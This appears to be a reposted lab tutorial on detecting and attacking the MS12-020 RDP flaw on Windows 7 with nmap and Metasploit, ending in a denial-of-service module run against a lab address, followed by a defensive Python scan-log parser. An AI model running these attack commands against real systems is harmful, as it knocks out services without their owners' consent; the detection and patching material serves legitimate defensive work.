Exploiting the MS12_020 vulnerability on Win7
Source: Internet. Editor: 程序博客网. Time: 2024/05/16 07:09
service postgresql start
1. nmap
root@MiWiFi-R1CL-srv:~# cd /usr/share/nmap/scripts/
root@MiWiFi-R1CL-srv:/usr/share/nmap/scripts# ls |grep rdp
http-wordpress-brute.nse
http-wordpress-enum.nse
http-wordpress-users.nse
rdp-enum-encryption.nse
rdp-vuln-ms12-020.nse
2. nmap -vv --open -p 3389 --script=rdp-vuln-ms12-020 192.168.159.128
3. msfconsole
search ms12-020
(1) Vulnerability check
msf > use auxiliary/scanner/rdp/ms12_020_check
msf auxiliary(ms12_020_check) > set rhosts 192.168.159.128    # set the remote IP
msf auxiliary(ms12_020_check) > show options    # view the configuration
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.159.128  yes       The target address range or CIDR identifier
   RPORT    3389             yes       Remote port running RDP (TCP)
   THREADS  1                yes       The number of concurrent threads
msf auxiliary(ms12_020_check) > run
[+] 192.168.159.128:3389 - 192.168.159.128:3389 - The target is vulnerable.    # the vulnerability exists
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
(2) Attacking the vulnerability
msf auxiliary(ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set rhost 192.168.159.128    # set the remote IP
rhost => 192.168.159.128
msf auxiliary(ms12_020_maxchannelids) > show options
msf auxiliary(ms12_020_maxchannelids) > run
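For defenders running the check in step (1) across a whole range, the saved scanner output can be turned into a patch list. The following is an added example, not part of the original post: it parses the line formats shown above, deduplicates hosts, sorts them numerically, and flags a log whose scan did not reach the last host. The sample log is constructed, and the function name `triage` is an assumption of this example.

```python
import ipaddress
import re

# Line formats printed by auxiliary/scanner/rdp/ms12_020_check in the session above.
VULN_RE = re.compile(
    r"^\[\+\]\s+(\d{1,3}(?:\.\d{1,3}){3}):(\d+)\s+-\s+.*The target is vulnerable\."
)
PROGRESS_RE = re.compile(r"^\[\*\]\s+Scanned\s+(\d+)\s+of\s+(\d+)\s+hosts")

# Constructed sample log: same line formats as above; only .128 comes from the page,
# the other address and the three-host range are made up for illustration.
SAMPLE_LOG = """\
[+] 192.168.159.128:3389 - 192.168.159.128:3389 - The target is vulnerable.
[*] Scanned 1 of 3 hosts (33% complete)
[+] 192.168.159.9:3389 - 192.168.159.9:3389 - The target is vulnerable.
[*] Scanned 2 of 3 hosts (66% complete)
[+] 192.168.159.128:3389 - 192.168.159.128:3389 - The target is vulnerable.
[*] Scanned 3 of 3 hosts (100% complete)
[*] Auxiliary module execution completed
"""


def triage(log_text):
    """Return (sorted unique vulnerable (ip, port) pairs, scan_complete)."""
    hosts = set()
    scanned = total = None
    for raw in log_text.splitlines():
        line = raw.strip()
        hit = VULN_RE.match(line)
        if hit:
            try:
                ip = ipaddress.IPv4Address(hit.group(1))
            except ipaddress.AddressValueError:
                continue  # octet out of range: not a real result line
            hosts.add((ip, int(hit.group(2))))
            continue
        progress = PROGRESS_RE.match(line)
        if progress:
            scanned, total = int(progress.group(1)), int(progress.group(2))
    # Only trust an empty or short list if the scanner reached the last host.
    complete = scanned is not None and scanned == total
    return [(str(ip), port) for ip, port in sorted(hosts)], complete


if __name__ == "__main__":
    vulnerable, complete = triage(SAMPLE_LOG)
    for ip, port in vulnerable:
        print(f"patch or restrict RDP: {ip}:{port}")
    if not complete:
        print("warning: scan log is incomplete, rerun before closing the ticket")
```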